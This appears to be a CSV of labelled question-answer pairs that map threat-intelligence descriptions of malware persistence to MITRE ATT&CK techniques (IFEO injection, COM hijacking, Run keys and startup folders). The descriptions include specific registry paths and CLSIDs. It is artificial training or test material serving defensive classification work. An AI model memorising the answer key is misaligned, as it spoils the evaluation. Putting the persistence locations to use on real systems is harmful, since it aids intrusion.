+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles modified and added entries within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options to maintain persistence.","Tecnique: T1546.012 Event Triggered Execution: Image File Execution Options Injection, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.,"Tecnique: T1546.012 Event Triggered Execution: Image File Execution Options Injection, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST created an Image File Execution Options (IFEO) Debugger registry value for the process dllhost.exe to trigger the installation of Cobalt Strike.,"Tecnique: T1546.012 Event Triggered Execution: Image File Execution Options Injection, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used PowerShell profiles to maintain persistence on an infected machine.,"Tecnique: T1546.013 Event Triggered Execution: PowerShell Profile, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used COM hijacking for persistence by replacing the legitimate MMDeviceEnumerator object with a payload.,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some variants of ADVSTORESHELL achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT has been seen persisting via COM hijacking through replacement of the COM object for MruPidlList {42aedc87-2188-41fd-b9a3-0c966feabec1} or Microsoft WBEM New Event Subsystem {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} depending on the system's CPU architecture.,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32.,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious can use COM hijacking to establish persistence.,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A}).,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has modified ComSysApp service to load the malicious DLL payload.,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito uses COM hijacking as a method of persistence.,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare has created the `HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32` Registry key for persistence.,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can add a CLSID key for payload execution through `Registry.CurrentUser.CreateSubKey(""Software\\Classes\\CLSID\\{"" + clsid + ""}\\InProcServer32"")`.","Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady has created the `HKEY_CURRENT_USER\Software\Classes\CLSID\{E6D34FFC-AD32-4d6a-934C-D387FA873A19}` Registry key for persistence.,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can perform COM hijacking by setting the path to itself to the `HKCU\Software\Classes\Folder\shell\open\command` key with a `DelegateExecute` parameter.,"Tecnique: T1546.015 Event Triggered Execution: Component Object Model Hijacking, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During AppleJeus's installation process, it uses `postinstall` scripts to extract a hidden plist from the application's `/Resources` folder and execute the `plist` file as a Launch Daemon with elevated permissions.","Tecnique: T1546.016 Event Triggered Execution: Installer Packages, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon established persistence by setting the HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load registry key to point to its executable.,"Tecnique: T1547 Boot or Logon Autostart Execution, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack’s RAT makes a persistent target file with auto execution on the host start.,"Tecnique: T1547 Boot or Logon Autostart Execution, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type has created registry keys for persistence, including `HKCU\Software\bkfouerioyou`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{6afa8072-b2b1-31a8-b5c1-{Unique Identifier}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3BF41072-B2B1-31A8-B5C1-{Unique Identifier}`.","Tecnique: T1547 Boot or Logon Autostart Execution, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat has created registry keys for persistence, including `HKCU\Software\dnimtsoleht\StubPath`, `HKCU\Software\snimtsOleht\StubPath`, `HKCU\Software\Backtsaleht\StubPath`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed. Components\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.","Tecnique: T1547 Boot or Logon Autostart Execution, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has added persistence via the Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load which causes the malware to run each time any user logs in.,"Tecnique: T1547 Boot or Logon Autostart Execution, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group placed LNK files into the victims' startup folder for persistence.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Sharpshooter, a first-stage downloader installed Rising Sun to `%Startup%\mssync.exe` on a compromised host.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 establishes persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT19 HTTP malware variant establishes persistence by setting the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has deployed malware that has copied itself to the startup directory for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 added Registry Run keys to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 places scripts in the startup folder for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has deployed a tool known as DarkComet to the Startup folder of a victim, and used Registry run keys to gain persistence.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37's has added persistence via the Registry key HKCU\Software\Microsoft\CurrentVersion\Run\.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has maintained persistence using the startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 created and modified startup files for persistence. APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used a batch script that adds a Registry Run key to establish malware persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has dropped malicious files into the startup folder `%AppData%\Microsoft\Windows\Start Menu\Programs\Startup` on a compromised host in order to maintain persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal's version of Bandook adds a registry key to HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has been known to establish persistence by adding programs to the Run Registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has added the registry value ntdll to the Registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 has established persistence by using the Registry option in PowerShell Empire to add a Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used Windows Registry run keys such as, `HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\hosts` to maintain persistence.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group tools have registered Run keys in the registry to give malicious VBS files persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa added a spoofed binary to the start-up folder for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has maintained persistence by modifying Registry run key value
+ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Several Ke3chang backdoors achieved persistence by adding a Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has placed scripts in the startup folder for persistence and modified the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce` Registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has achieved persistence via writing a PowerShell script to the autorun registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used malicious DLLs that setup persistence in the Registry Key `HKCU\Software\Microsoft\Windows\Current Version\Run`.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware has used Registry Run keys to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats saved malicious files within the AppData and Startup folders to maintain persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has created the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AdobelmdyU to maintain persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has modified a victim's Windows Run registry to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has used Registry run keys to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has added the path of its second-stage malware to the startup folder to achieve persistence. One of its file stealers has also persisted by adding a Registry Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A dropper used by Putter Panda installs itself into the ASEP Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run with a value named McUpdate.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has used Registry run keys to establish persistence for the RTM Trojan and other tools, such as a modified version of TeamViewer remote desktop software.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has added paths to executables in the Registry to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used HKCU\Software\Microsoft\Windows\CurrentVersion\Run, HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and the Startup folder to establish persistence.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has placed VBS files in the Startup folder and used Registry run keys to establish persistence for malicious payloads.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has added batch scripts to the startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390's malware can add a Registry key to `Software\Microsoft\Windows\CurrentVersion\Run` for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has created shortcuts in the Startup folder to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Turla Javascript backdoor added a local_update_check value under the Registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to establish persistence. Additionally, a Turla custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has created LNK files in the Startup folder to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has established persistence via the Registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and a shortcut within the startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has created a Registry Run key named Dropbox Update Setup to establish persistence for a malicious Python binary.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL achieves persistence by adding itself to the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ANDROMEDA can establish persistence by dropping a sample of itself to `C:\ProgramData\Local Settings\Temp\mskmde.com` and adding a Registry run key to execute every time a user logs on.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can add itself to the Registry as a startup program to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has changed the Startup folder to the one containing its executable by overwriting the registry keys.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has the ability to create the Registry key name EstsoftAutoUpdate at HKCU\Software\Microsoft/Windows\CurrentVersion\RunOnce to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has established persistence via the Startup folder or Run Registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth creates a startup item for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuTo Stealer can place malicious executables in a victim's AutoRun registry key or StartUp directory, depending on the AV product installed, to maintain persistence.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon uses registry run keys for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has been executed via the `RunOnce` Registry key to run itself on safe mode.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BACKSPACE achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS installs a registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssonsvr.exe.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea adds Registry Run keys to achieve persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch establishes a foothold by adding a link to the malware executable in the startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can create or add files to Registry Run Keys to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has added itself to the Registry key HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\ for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer has set the run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The BlackEnergy 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can establish persistence by writing the Registry value MicroNativeCacheSvc to HKCU\Software\Microsoft\Windows\CurrentVersion\Run.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Briba creates run key Registry entries pointing to malicious DLLs dropped to disk.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORESHELL has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
